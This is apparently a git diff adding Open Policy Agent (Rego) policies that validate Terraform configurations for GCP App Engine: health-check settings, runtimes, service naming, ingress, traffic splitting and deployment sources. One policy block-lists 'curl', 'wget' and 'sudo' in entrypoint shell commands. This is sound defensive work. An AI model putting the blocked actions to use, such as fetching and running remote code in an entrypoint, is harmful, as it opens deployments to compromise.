b/policies/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.entrypoint.shell + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine entrypoint contains unauthorized/insecure commands", + "remedies": ["Please remove 'sudo', 'curl', or 'wget' from the entrypoint.shell command"] + }, + { + "condition": "Blacklist insecure shell commands", + "attribute_path": ["entrypoint", 0, "shell"], + "values": ["*/*", [ ["sudo node .", "curl .", "wget .", "sudo", "curl", "wget"], [] ]], + "policy_type": "pattern blacklist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/policy.rego new file mode 100644 index 000000000..918c5fac0 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/policy.rego @@ -0,0 +1,24 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.liveness_check.failure_threshold + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + + +conditions := [ + [ + { + "situation_description": "failure_threshold is too low/not safely configured", + "remedies": ["Set failure_threshold to at least 1" + ] + }, + { + "condition": "Check that failure_threshold is below minimum safe value", + "attribute_path": ["liveness_check", 0, "failure_threshold"], + "values": [1, null], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/policy.rego new file mode 100644 index 000000000..2b34e1e22 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.liveness_check.path + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine liveness check is pointing to an unapproved path", + "remedies": ["set liveness_check.path to an approved endpoint (e.g. '/', '/healthz')"] + }, + { + "condition": "Whitelist approved liveness paths", + "attribute_path": ["liveness_check", 0, "path"], + "values": ["/", "/healthz"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/policy.rego new file mode 100644 index 000000000..7fae022ca --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.liveness_check.timeout + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine liveness check timeout is set to an unapproved duration", + "remedies": ["set 'liveness_check.timeout' to an approved duration (within 1s to 10s')"] + }, + { + "condition": "Whitelist approved timeout durations", + "attribute_path": ["liveness_check", 0, "timeout"], + "values": ["1s", "2s", "3s", "4s", "5s", "6s", "7s", "8s", "9s", "10s", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/policy.rego new file mode 100644 index 000000000..5c0abe922 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/policy.rego @@ -0,0 +1,24 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.readiness_check.failure_threshold + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + + +conditions := [ + [ + { + "situation_description": "failure_threshold is too low/not safely configured", + "remedies": ["Set failure_threshold to at least 1" + ] + }, + { + "condition": "Check that failure_threshold is below minimum safe value", + "attribute_path": ["readiness_check", 0, "failure_threshold"], + "values": [1, null], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/policy.rego new file mode 100644 index 000000000..1326aee29 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.readiness_check.path + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine readiness check is pointing to a path that is unapproved", + "remedies": ["Set 'readiness_check.path' to an approved endpoint (e.g. '/', '/health')"] + }, + { + "condition": "Ensure readiness check path is allowed", + "attribute_path": ["readiness_check", 0, "path"], + "values": ["/", "/health"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/policy.rego new file mode 100644 index 000000000..fa500ddd5 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.readiness_check.timeout + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine readiness check timeout is set to an unapproved duration", + "remedies": ["Have 'readiness_check.timeout' set to an approved duration (within 1s to 10s)"] + }, + { + "condition": "Ensure readiness timeout is within 1-10s", + "attribute_path": ["readiness_check", 0, "timeout"], + "values": ["1s", "2s", "3s", "4s", "5s", "6s", "7s", "8s", "9s", "10s", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/runtime/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/runtime/policy.rego new file mode 100644 index 000000000..59af4f0cc --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/runtime/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.runtime + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine Flexible is using an unapproved/deprecated runtime", + "remedies": ["Set 'runtime' to an approved value (e.g., 'nodejs', 'python', 'java')"] + }, + { + "condition": "Whitelist approved Flexible runtimes", + "attribute_path": ["runtime"], + "values": ["nodejs", "python", "java", "custom"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/service/policy.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/service/policy.rego new file mode 100644 index 000000000..6eecc1639 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/service/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine service name does not meet naming standards", + "remedies": ["Rename the service to 'default' or use the 'hh-' prefix (e.g.'hh-frontend')"] + }, + { + "condition": "Service name must be 'default' or start with 'hh-'", + "attribute_path": ["service"], + "values": ["*", [["default", "hh-*"]]], + "policy_type": "pattern whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_flexible_app_version/vars.rego b/policies/gcp/app_engine/app_engine_flexible_app_version/vars.rego new file mode 100644 index 000000000..67a707cae --- /dev/null +++ b/policies/gcp/app_engine/app_engine_flexible_app_version/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_flexible_app_version.vars + + +variables := { + "friendly_resource_name": "App Engine Flexible App Version", # eg., "GCS Bucket", + "resource_type": "google_app_engine_flexible_app_version", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/policy.rego b/policies/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/policy.rego new file mode 100644 index 000000000..d764d9622 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_network_settings.ingress_traffic_allowed + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_network_settings.vars + +conditions := [ + [ + { + "situation_description": "App Engine service ingress is too permissive or unspecified", + "remedies": ["Set ingress_traffic_allowed to 'INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY'"] + }, + { + "condition": "Enforce internal-only ingress", + "attribute_path": ["network_settings", 0, "ingress_traffic_allowed"], + "values": ["INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_network_settings/service/policy.rego b/policies/gcp/app_engine/app_engine_service_network_settings/service/policy.rego new file mode 100644 index 000000000..e49af78a4 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_network_settings/service/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_network_settings.service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_network_settings.vars + +conditions := [ + [ + { + "situation_description": "App Engine service name does not follow the required naming convention", + "remedies": ["Ensure to set the service name to an approved value, such as 'app-internal-service'"] + }, + { + "condition": "Check service naming against whitelist", + "attribute_path": ["service"], + "values": ["app-internal-service"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_network_settings/vars.rego b/policies/gcp/app_engine/app_engine_service_network_settings/vars.rego new file mode 100644 index 000000000..11d377fcf --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_network_settings/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_service_network_settings.vars + + +variables := { + "friendly_resource_name": "App Engine Service Network Settings", # eg., "GCS Bucket", + "resource_type": "google_app_engine_service_network_settings", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/policy.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/policy.rego new file mode 100644 index 000000000..4271211ca --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.migrate_traffic + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + +conditions := [ + [ + { + "situation_description": "Traffic is being migrated immediately, bypassing the split configuration", + "remedies": ["Have migrate_traffic set to 'false' to respect the defined version allocations"] + }, + { + "condition": "ensure traffic split is respected", + "attribute_path": ["migrate_traffic"], + "values": [false], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/service/policy.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/service/policy.rego new file mode 100644 index 000000000..e19f7de41 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/service/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + +conditions := [ + [ + { + "situation_description": "Traffic splitting is applied to an unapproved service", + "remedies": ["Set the service name to an approved value such as 'hardhat-main-api'"] + }, + { + "condition": "Check service against approved whitelist", + "attribute_path": ["service"], + "values": ["hardhat-main-api"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/split/allocations/policy.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/split/allocations/policy.rego new file mode 100644 index 000000000..af4572072 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/split/allocations/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.allocations + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + +conditions := [ + [ + { + "situation_description": "Version 'v1' is receiving an unapproved amount of traffic", + "remedies": ["ensure 'v1' allocation is set to a standard split (e.g. 0.5 or 0.8)"] + }, + { + "condition": "Check v1 traffic allocation", + "attribute_path": ["split", 0, "allocations", "v1"], + "values": [0.01, 0.99], + "policy_type": "range" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/policy.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/policy.rego new file mode 100644 index 000000000..5592a74c6 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.shard_by + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + +conditions := [ + [ + { + "situation_description": "Traffic sharding mechanism is unstable/unspecified", + "remedies": ["Need to set split.shard_by to 'IP' or 'COOKIE' to ensure stable session routing"] + }, + { + "condition": "Whitelist stable sharding mechanisms", + "attribute_path": ["split", 0, "shard_by"], + "values": ["IP", "COOKIE"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_service_split_traffic/vars.rego b/policies/gcp/app_engine/app_engine_service_split_traffic/vars.rego new file mode 100644 index 000000000..440a51f64 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_service_split_traffic/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_service_split_traffic.vars + + +variables := { + "friendly_resource_name": "App Engine Service Split Traffic", # eg., "GCS Bucket", + "resource_type": "google_app_engine_service_split_traffic", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/policy.rego new file mode 100644 index 000000000..ef0250986 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.deployment.zip.source_url + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine Standard application code is being deployed via an unauthorized source URL", + "remedies": ["Ensure to set 'deployment.zip.source_url' to the authorized GCS URL"] + }, + { + "condition": "Match against exact approved deployment URLs", + "attribute_path": ["deployment", 0, "zip", 0, "source_url"], + "values": ["https://storage.googleapis.com/appengine-static-content/hello-world.zip"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/policy.rego new file mode 100644 index 000000000..8df765b5e --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.entrypoint.shell + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + [ + { + "situation_description": "The App Engine Standard entrypoint is using an unapproved runtime/file structure", + "remedies": ["Follow the format 'node ./app.js' or 'python ./main.py'"] + }, + { + "condition": "Whitelist approved shell execution patterns", + "attribute_path": ["entrypoint", 0, "shell"], + "values": ["*/*", [ ["node .", "python ."], ["app.js", "server.js", "main.py"] ]], + "policy_type": "pattern whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/instance_class/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/instance_class/policy.rego new file mode 100644 index 000000000..ed053e2b9 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/instance_class/policy.rego @@ -0,0 +1,36 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.instance_class + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + # scenario 1: + [ + { + "situation_description": "The App Engine service name is not approved.", + "remedies": ["Set 'service' to 'prod-web'."] + }, + { + "condition": "Whitelist service names", + "attribute_path": ["service"], + "values": ["prod-web"], + "policy_type": "whitelist" + } + ], + # scenario 2 + [ + { + "situation_description": "The Instance Class is not approved.", + "remedies": ["Set 'instance_class' to 'F1'."] + }, + { + "condition": "Whitelist instance classes", + "attribute_path": ["instance_class"], + "values": ["F1"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/runtime/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/runtime/policy.rego new file mode 100644 index 000000000..e4bc8242e --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/runtime/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.runtime + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine Standard runtime is using an unapproved/deprecated language version", + "remedies": ["set the 'runtime' attribute to an approved version (e.g. 'nodejs20', 'python311' or 'java17')"] + }, + { + "condition": "Whitelist approved Standard runtimes", + "attribute_path": ["runtime"], + "values": ["nodejs20", "python311", "java17"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/service/policy.rego b/policies/gcp/app_engine/app_engine_standard_app_version/service/policy.rego new file mode 100644 index 000000000..0576db509 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/service/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.service + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + +conditions := [ + [ + { + "situation_description": "App Engine Standard service name does not follow the naming standards required", + "remedies": ["Rename the service to 'default' or a name starting with 'hh-' (e.g., 'hh-frontend')"] + }, + { + "condition": "Check if service name is 'default' or prefixed with 'hh-'", + "attribute_path": ["service"], + "values": ["*", [["default", "hh-*"]]], + "policy_type": "pattern whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_standard_app_version/vars.rego b/policies/gcp/app_engine/app_engine_standard_app_version/vars.rego new file mode 100644 index 000000000..8c51b8cb1 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_standard_app_version/vars.rego @@ -0,0 +1,8 @@ +package terraform.gcp.security.app_engine.app_engine_standard_app_version.vars + + +variables := { + "friendly_resource_name": "App Engine Standard App Version", # eg., "GCS Bucket", + "resource_type": "google_app_engine_standard_app_version", # eg., "google_storage_bucket" + "resource_value_name" : "name" # eg., "name" +} \ No newline at end of file